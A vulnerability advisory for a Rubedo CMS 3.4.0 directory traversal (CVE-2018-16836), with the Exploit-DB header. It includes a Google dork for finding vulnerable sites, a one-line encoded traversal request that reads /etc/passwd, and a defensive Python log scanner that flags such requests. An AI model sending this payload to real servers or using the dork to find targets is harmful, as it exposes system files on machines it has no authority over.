Vendor: Rubedo CMS
By: Marouene Boubakri
CVSS: 9.8 (CRITICAL)
CWE: 22 (Directory Traversal)
Product Name: Rubedo CMS
Affected Version From: 3.4.0
Affected Version To: 3.4.0
Patch Exists: YES
Related CVE: CVE-2018-16836
CPE: a:rubedo_project:rubedo_cms
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Linux
2018

Rubedo CMS 3.4.0 – Directory Traversal

A directory traversal vulnerability exists in Rubedo CMS 3.4.0 which allows an attacker to read the /etc/passwd file from a remote server by sending a specially crafted request.

Mitigation:

Upgrade to the latest version of Rubedo CMS to mitigate this vulnerability.

Exploit-DB raw data:

# Exploit Title: Rubedo CMS 3.4.0 - Directory Traversal
# Google Dork: intext:rubedo.current.page.description
# Date: 2018-09-11
# Exploit Author: Marouene Boubakri
# Vendor Homepage: https://www.rubedo-project.org
# Version: through 3.4.0
# Tested on: Linux
# CVE : CVE-2018-16836

# PoC:
# Read /etc/passwd file from remote server

/theme/default/img/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e//etc/passwd'
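
A defender-side check for this request pattern, added here as an example and not part of the original advisory or the Rubedo code base: it percent-decodes each logged request path before normalising it, so `%2e%2e` segments are caught where a literal `../` match would miss them. The `/theme/` prefix comes from the PoC path; the log format, function names and sample lines are assumptions constructed for illustration.

```python
import posixpath
import re
from urllib.parse import unquote, urlsplit

# Assumption: static theme assets are served under this URL prefix, as in the PoC path.
STATIC_PREFIX = "/theme/"
# Request line of a combined-format access log entry (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|HEAD|POST) (\S+) HTTP/[\d.]+"')


def fully_decode(path, max_rounds=3):
    """Percent-decode repeatedly so %2e%2e and %252e%252e both become '..'."""
    for _ in range(max_rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path


def escapes_static_root(raw_target):
    """True if a request under STATIC_PREFIX resolves outside it once decoded."""
    path = fully_decode(urlsplit(raw_target).path).replace("\\", "/")
    if not path.startswith(STATIC_PREFIX):
        return False
    resolved = posixpath.normpath(path)
    return not (resolved + "/").startswith(STATIC_PREFIX)


def flag_traversal(log_lines):
    """Return the request targets in log_lines that escape the static root."""
    hits = []
    for line in log_lines:
        m = REQUEST_RE.search(line)
        if m and escapes_static_root(m.group(1)):
            hits.append(m.group(1))
    return hits


# Constructed sample log lines (not real traffic).
SAMPLE_LOG = [
    '198.51.100.7 - - [11/Sep/2018:10:00:01 +0000] "GET /theme/default/img/logo.png HTTP/1.1" 200 5120',
    '198.51.100.7 - - [11/Sep/2018:10:00:02 +0000] "GET /theme/default/img/%2e%2e/%2e%2e/%2e%2e/%2e%2e//etc/passwd HTTP/1.1" 200 1843',
    '198.51.100.7 - - [11/Sep/2018:10:00:03 +0000] "GET /theme/default/img/%2e%2e/css/site.css HTTP/1.1" 200 901',
    '198.51.100.7 - - [11/Sep/2018:10:00:04 +0000] "GET /theme/default/%252e%252e/%252e%252e/%252e%252e/etc/hosts HTTP/1.1" 404 0',
]

if __name__ == "__main__":
    for target in flag_traversal(SAMPLE_LOG):
        print("traversal outside", STATIC_PREFIX, "->", target)
```

The third sample line contains an encoded `..` but still resolves inside `/theme/`, so it is not flagged; only requests that leave the static root are reported.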